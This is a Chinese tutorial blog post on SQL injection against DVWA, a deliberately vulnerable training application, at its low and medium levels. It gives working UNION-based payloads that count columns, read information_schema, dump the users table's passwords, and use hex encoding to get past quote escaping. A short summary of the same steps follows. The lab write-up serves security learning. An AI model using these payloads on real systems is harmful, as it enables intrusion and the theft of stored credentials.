DVWA_SQL注入低中等级讲解

首先需要我们了解一下SQL注入的原理是什么:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串.

SQL注入分为:数字型  字符型  报错注入  Boollean注入  时间盲注

再来了解一些基本的SQL查询语言: 创建库
create database db1;
创建库是否存在,不存在则创建
create database if not exists db1;
查看所有数据库
show databases;
查看某个数据库的定义信息 
show create database db1; 
修改数据库字符信息
alter database db1 character set utf8; 
删除数据库
drop database db1; 

之后开始操作

应该先判断是数字型注入还是字符型注入

输入1返回正确值

 我们再输入1'发现报错

 我们再输入1' and '1' ='1返回正确值

 由此我们可以发现他是字符型注入

我们在来判断字段数1' order by 1#

 再来1' order by 2# 以此类推直到报错就有几列

第3次报错说明只有两列

再来判断回显位置1' union select 1,2#

之后判断数据库1'union select 1,database()# 

 判断表名1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

判断字段名 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

 获取数据1' union select user,password from users # 

 low难度完成

把难度改为medium

其实medium就比low多了个抓包在bp中完成SQL注入就可以绕过防御

抓包后判断注入

 修改ID为1 or 1=1 #

 成功返回

 判断为数字型注入

之后与low相同在bp中就可以绕过防御

只有获取字段名时单引号被转义变成\'

可以用16进制绕过1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,

  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA(Damn Vulnerable Web Application)是一个用于学习和实践网络应用安全的漏洞环境。下面是一个简单的DVWA中的SQL注入攻击流程: 1. 打开DVWA:在浏览器中输入DVWA的地址,并登录到应用程序。 2. 设置安全级别:在DVWA中,有不同的安全级别可供选择。初始安全级别设置为低,你可以通过点击页面上的"DVWA Security"来更改安全级别。 3. 选择目标:在DVWA的主页中,选择"SQL Injection"选项。 4. 探测注入点:在输入框中输入一个单引号('),并观察页面的响应。如果页面显示了SQL错误信息,那么该输入点很可能是一个注入点。 5. 获取数据库版本:使用注入点来获取数据库的版本信息。尝试使用不同的SQL语句,如"1' OR 1=1--"或"1' UNION SELECT @@version--"来获取版本信息。 6. 获取数据库表名:通过使用UNION SELECT语句和ORDER BY子句来获取数据库中的表名。例如,使用语句"1' UNION SELECT table_name FROM information_schema.tables--"来获取表名。 7. 获取表数据:通过使用SELECT语句和FROM子句来获取特定表的数据。使用语句"1' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'--"来获取表的列名。然后,使用语句"1' UNION SELECT column1, column2 FROM table_name--"来获取表的具体数据。 请注意,这只是一个简单的DVWASQL注入攻击的流程示例。在实际情况中,攻击者可能需要进行更多的尝试和调整来成功地执行SQL注入攻击。同时,强烈建议仅在合法授权和控制下使用这些技术,以遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值